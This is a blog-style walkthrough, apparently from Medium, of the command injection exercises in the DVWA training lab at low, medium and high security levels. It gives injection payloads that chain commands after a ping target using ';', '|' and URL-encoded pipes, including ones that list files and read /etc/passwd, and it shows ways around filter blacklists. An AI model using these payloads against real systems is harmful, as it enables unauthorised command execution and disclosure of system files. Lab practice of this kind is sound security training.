DVWA vulnerability: Command Injection

Hey Guys, Our Second Vulnerability is Command Injection on low level of Security. So Let’s Start.

So this is the interface:

LOW

Let firstly check the source code for low:

We can see that the code does not check if the target matches an IP address. No filtering on special characters. ; in Unix/Linux allows for commands to be separated.

Let’s try pinging 127.0.0.1 and see the output:

It is pinging now let’s try this command and see if we can see any files.

127.0.0.1; ls -al

To list all the files in the current directory:

Its working now let’s go to /etc/passwd and grep the password.

so as you can see Its working and showing the output. That means Our Command Injection payload successfully executed.

Happy Hacking !!!

Now we’re gonna see Command injection on medium level difficulty. Interface is same.

Let’s see the source code first.

As you can clearly see some commands are already blacklisted which are ; , &&. So what we can do is we can use | (pipe) symbol to get executed the commands. Let’s Firslty start with normal ping command.

Normal Output Lets now try the below command with ;

127.0.0.1 ; pwd

Nothing Happened. Now Let’s try this command with |

127.0.0.1 | pwd

pwd is use to check present working directory:

It says /var/www/html/vulnerabilities/exec

That means pipe symbol( | ) is working. You can also you || sign too. Let’s get into the /etc/passwd file and cat it making it to solve the lab.

HAPPY HACKING !!!!

Now Let’s try command injection on Hard level of security.

Firstly let’s start of with the viewing of source code:

As you can see all the things which leads to command injection are blocked. So in this case we’ve to take a reverse shell on our system with the netcat utility.

Starting of with normal ping:

Now we have all the symbols filtered out which can use to execute commands. But Let’s trim all the spaces in the command and see if this will work or not. I’m randomly trying.

Here is the output:

It worked ! I really not thought it will not get filtered out. Now to grab the /etc/passwd file I am going to use burpsuite.

I saw the http history and sended it to the repeater to perform more tests. For | it is using %7C lets try to grab /etc/passwd file.

For the command is:

127.0.0.1%7Ccat%20/etc/passwd

%7C = |
%20 = space

Here is the output:

Hence we’ve solved all the level of securities for command Injection Vulnerability.

HAPPY HACKING !!!!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store